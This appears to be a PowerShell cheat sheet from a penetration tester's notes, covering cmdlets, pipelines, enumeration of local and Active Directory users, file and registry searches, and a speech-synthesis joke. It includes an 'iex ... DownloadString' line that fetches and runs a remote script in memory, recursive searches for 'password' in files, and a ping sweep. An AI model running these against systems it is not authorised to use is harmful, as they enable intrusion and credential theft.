# Powershell ### Basics {% hint style="info" %} Use `Get-Member` to list all properties and methods of an object! {% endhint %} ```bash get-command set* # Searches for all cmdlets that start with "set" alias # List all aliases in shell Get-ChildItem # Same as ls, dir, and gci Copy-Item # Same as cp, copy, and cpi Move-Item # Same as mv, move, and mi Select-String # Same as sls and similar to grep Get-Help # Get help!! Get-Content # Same as cat, type, gc Get-Process # Same as ps, gps Get-Location # Same as pwd, gl Get-Member # Get properties and methods of objects - USEFUL!!!! ps | format-list -property name, id, starttime # Formatted list of process properties ls env: # List all PS environment variables ls variable: # List all PS variables ``` ### Getting Help ```bash help gci # displays help for Get-ChildItem help gci -detailed # Very verbose help information help gci -examples # Examples on how to USE it!!! help gci -full # Pretty much everything it has about it Remove-Item *.* -WhatIf # Explains what WOULD happen, but not actually do it ``` ### Pipeline Objects Used to help automate between operations in a pipe. The `%` is an alias for `ForEach-Object` command. The current object in an array of objects is referred to as `$_`. Pipeline objects can be filtered with the `?` alias for `Where-Object`. Command below will write out all names and PIDs of processes returned by `ps` alias. ```bash ps | gm # Find all properties and methods first ps | % {write-host "name is" $_.name " and pid is " $_.ID} ps | ? {write-host "Running PID name is " $_.status -eq "running"} # Counting loops to move between two sets of numbers 1..10 | % {echo $_} 1..255 | % {ping -n 1 192.168.0.$_ | select-string ttl} ``` ### Enumerate Local Users Enumerate the local users on the machine and print out important information about their accounts. ```powershell Get-LocalUser | Select-Object Name, LastLogon, PasswordLastSet, Enabled, PasswordRequired, PrincipalSource, Description | Format-Table -AutoSize ``` ### Enumerate AD Users We can import the signed Microsoft ActiveDirectory module into PowerShell directly in memory to enumerate AD users and systems. This leverages the signed module kept at . After importing we have access to all AD commands in PowerShell. ```powershell iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory ``` ### Searching Looking for files and directories. ```bash # Search the entire C:\ dir for anything with "password" in the filename. Put stderr in null where it belongs gci -recurse C:\ password 2>$null | % {echo $_.fullname} # Select-string works similar to grep select-string -path C:\Users\*.txt -pattern password # Put both together! Look in each file for the string "password" gci -recurse C:\ | % {select-string -path $_ -pattern password} 2>$null ``` ### Navigate Registry ```bash # Can navigate Reg just like the file system using tab completion cd HKLM:\ ``` Launch Browsers and reach a specific page ``` "C:\Program Files\Internet Explorer\iexplore.exe" m4lwhere.org "C:\Program Files\Mozilla Firefox\firefox.exe" m4lwhere.org ``` ### Networking Quick and dirty way to check if a port is open on a remote computer ``` New-Object System.Net.Sockets.TCPClient –Argument "10.0.0.1","389" ``` ### Speaking to the Users! This is a hilarious way to download a random cat fact and have it speak to the user through the speaker. ``` Add-Type -AssemblyName System.Speech $SpeechSynth = New-Object System.Speech.Synthesis.SpeechSynthesizer $SpeechSynth.SelectVoice("Microsoft Zira Desktop") $Browser = New-Object System.Net.WebClient $Browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $CatFact = (ConvertFrom-Json (Invoke-WebRequest -Verbose -Uri https://catfact.ninja/fact -UseBasicParsing)) $CatFact.fact $SpeechSynth.Speak("Did you know ?") $SpeechSynth.Speak($CatFact.fact) ```